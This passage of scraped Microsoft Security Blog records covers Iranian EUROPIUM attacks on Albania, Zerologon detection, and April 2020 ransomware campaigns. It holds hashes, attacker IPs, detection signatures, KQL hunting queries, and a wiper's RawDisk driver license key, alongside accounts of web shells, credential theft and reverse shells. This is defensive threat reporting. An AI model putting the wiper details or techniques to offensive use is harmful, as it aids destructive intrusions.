Wipes the give path leveraging _rwdsk.sys _driver\nFigure 14. The malware using _rwdsk.sys_\n\n * Service created: HKLM\\SYSTEM\\CurrentControlSet\\Services\\RawDisk3\n * Installed driver should be located in C:\\Windows\\System32\\drivers\\rwdsk.sys or the same directory cl.exe is staged.\nFigure 15. Directory where the driver is installed\n\n * By providing path (Example: \\??\\PHYSICALDRIVE0) with the &#x27;wp&#x27; parameter, passes it to the below function including GENERIC_READ | GENERIC_WRITE access value and a hexadecimal value &quot;B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D&quot;. Based on the reference below, the same hex value is used in ZeroCleare Wiper in 2020. [IBM confirms](<https://www.ibm.com/downloads/cas/OAJ4VZNJ>) this value is the license key for RawDisk\nFigure 16. Hex value used in ZeroCleare Wiper\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion\n * Block inbound traffic from IPs specified in the Indicators of compromise table\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity \n \n**NOTE: **Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure your accounts\n * Enable [Microsoft Defender Antivirus tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) to prevent unwanted malicious apps disabling components of Microsoft Defender Antivirus\n * [Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>)\n\n## Indicators of compromise (IOCs)\n\nThe table below shows IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\n**Indicator**| **Type**| **Description** \n---|---|--- \nGoXml.exe| SHA-256| f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n&quot;w.zip&quot;, \n&quot;cl.exe&quot; \n&quot;cls5.exe&quot;| SHA-256| e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \nWin.bat| SHA-256| bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6 \nADExplorer.exe| SHA-256| bb45d8ffe245c361c04cca44d0df6e6bd7596cabd70070ffe0d9f519e3b620ea \nLdd.2.exe| SHA-256| e67c7dbd51ba94ac4549cc9bcaabb97276e55aa20be9fae909f947b5b7691e6b \nMellona.exe| SHA-256| ac4809764857a44b269b549f82d8d04c1294c420baa6b53e2f6b6cb4a3f7e9bd \nSl.exe| SHA-256| d1bec48c2a6a014d3708d210d48b68c545ac086f103016a20e862ac4a189279e \nHxD.exe (Hex Editor)| SHA-256| d145058398705d8e20468332162964dce5d9e2ad419f03b61adf64c7e6d26de5 \nLsdsk.exe| SHA-256| 1c926d4bf1a99b59391649f56abf9cd59548f5fcf6a0d923188e7e3cab1c95d0 \nNTDSAudit.exe| SHA-256| fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b \nDisable-defender.exe| SHA-256| 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace \nRognar.exe| SHA-256| dfd631e4d1f94f7573861cf438f5a33fe8633238d8d51759d88658e4fbac160a \nIpgeter.exe| SHA-256| 734b4c06a283982c6c3d2952df53e0b21e55f3805e55a6ace8379119d7ec1b1d \nevaluatesiteupgrade.aspx| SHA-256| f8db380cc495e98c38a9fb505acba6574cbb18cfe5d7a2bb6807ad1633bf2df8 \nPickers.aspx| SHA-256| 0b647d07bba697644e8a00cdcc8668bb83da656f3dee10c852eb11effe414a7e \nClientBin.aspx| SHA-256| 7AD64B64E0A4E510BE42BA631868BBDA8779139DC0DAAD9395AB048306CC83C5 \nApp_Web_bckwssht.dll| SHA-256| CAD2BC224108142B5AA19D787C19DF236B0D12C779273D05F9B0298A63DC1FE5 \nC:\\Users\\&lt;User name&gt;\\Desktop\\| Staging directory| \nC:\\ProgramData\\| Staging directory| \nC:\\Users\\&lt;User name&gt;\\Desktop\\a| Staging directory| \nC:\\ProgramData\\1\\| Staging directory| \nC:\\ProgramData\\2\\| Staging directory| \n144[.]76[.]6[.]34| IP address| Accessed web shell \n148[.]251[.]232[.]252| IP address| Accessed web shell \n148[.]251[.]233[.]231| IP address| Accessed web shell \n176[.]9[.]18[.]143| IP address| Accessed web shell \n185[.]82[.]72[.]111| IP address| Accessed web shell \n216[.]24[.]219[.]65| IP address| Accessed web shell \n216[.]24[.]219[.]64| IP address| Accessed web shell \n46[.]30[.]189[.]66| IP address| Accessed web shell \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\nMicrosoft Defender Threat Intelligence Community members and customers can find summary information and all IOCs from this blog post in the linked [Microsoft Defender Threat Intelligence article](<https://ti.defender.microsoft.com/articles/37f61f2a>).\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Microsoft Defender Antivirus\n\n * TrojanDropper:ASP/WebShell!MSR (web shell)\n * Trojan:Win32/BatRunGoXml (malicious BAT file)\n * DoS:Win64/WprJooblash (wiper)\n * Ransom:Win32/Eagle!MSR (ransomware)\n * Trojan:Win32/Debitom.A (_disable-defender.exe_)\n\n#### Microsoft Defender for Endpoint EDR\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) customers should watch for these alerts that can detect behavior observed in this campaign. Note however that these alerts are not indicative of threats unique to the campaign or actor groups described in this report.\n\n * Suspicious behavior by Web server process\n * Mimikatz credential theft tool\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious RDP connection observed\n * Addition to Exchange Organization Management role group\n * TrustedInstaller hijack attempt\n * Microsoft Defender Antivirus tampering\n * Process removed a security product\n * Tamper protection bypass\n * Suspicious file in startup folder\n * Ransomware behavior detected in the file system\n * Ransomware behavior by remote device\n * Emerging threat activity group\n\n#### Microsoft Defender Vulnerability Management\n\n[Microsoft Defender Vulnerability Management](<https://www.microsoft.com/security/business/threat-protection/microsoft-defender-vulnerability-management>) surfaces impacted devices that may be affected by the Exchange (ProxyLogon) and SharePoint vulnerabilities used in the attack:\n\n * [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0604>)\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)\n\n## Advanced hunting queries\n\n### Microsoft Sentinel\n\nTo locate possible threat actor activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:\n\n**Identify threat actor IOCs**\n\nThis query identifies a match based on IOCs related to EUROPIUM across various Microsoft Sentinel data feeds:\n\n * [https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EUROPIUM _September2022.yaml](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EUROPIUM%20_September2022.yaml>)\n\n**Identify Microsoft Defender Antivirus detection related to EUROPIUM**\n\nThis query looks for Microsoft Defender AV detections related to EUROPIUM actor and joins the alert with other data sources to surface additional information such as device, IP, signed-in users, etc.\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/EuropiumAVHits.yaml>\n\n**Identify creation of unusual identity **\n\nThe query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands.\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EuropiumUnusualIdentity.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible threat actor activity mentioned in this blog post, Microsoft 365 Defender customers can use the queries detailed below:\n\n**Identify EUROPIUM IOCs**\n\nThe following query can locate activity possibly associated with the EUROPIUM threat actor. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20EUROPIUM%20IOCs.yaml>)\n \n \n DeviceFileEvents | where SHA256 in (\"f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5\",\"e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0\",\"bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6\",\"bb45d8ffe245c361c04cca44d0df6e6bd7596cabd70070ffe0d9f519e3b620ea\",\"d1bec48c2a6a014d3708d210d48b68c545ac086f103016a20e862ac4a189279e\",\"fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b\",\"45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace\",\"f8db380cc495e98c38a9fb505acba6574cbb18cfe5d7a2bb6807ad1633bf2df8\",\"7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5\",\"cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5\",\"84be43f5830707cd421979f6775e9edde242bab98003644b3b491dbc08cc7c3e\")\n\n**Identify Microsoft Defender Antivirus detection related to EUROPIUM**\n\nThis query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20Microsoft%20Defender%20Antivirus%20detection%20related%20to%20EUROPIUM.yaml>)\n \n \n let europium_sigs = dynamic([\"BatRunGoXml\", \"WprJooblash\", \"Win32/Eagle!MSR\", \"Win32/Debitom.A\"]); \n AlertEvidence\n | where ThreatFamily in~ (europium_sigs)\n | join AlertInfo on AlertId\n | project ThreatFamily, AlertId\n\n**Identify unusual identity additions related to EUROPIUM**\n\nThis query looks for identity additions through exchange PowerShell. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20unusual%20identity%20additions%20related%20to%20EUROPIUM.yaml>)\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"New-Mailbox\",\"Update-RoleGroupMember\") and ProcessCommandLine has \"HealthMailbox55x2yq\"\n\nThe post [Microsoft investigates Iranian attacks against the Albanian government](<https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T15:00:00", "type": "mssecure", "title": "Microsoft investigates Iranian attacks against the Albanian government", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2021-26855"], "modified": "2022-09-08T15:00:00", "id": "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "href": "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-02T21:36:53", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&amp;CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-30T17:00:20", "type": "mssecure", "title": "Zerologon is now detected by Microsoft Defender for Identity", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2020-11-30T17:00:20", "id": "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter 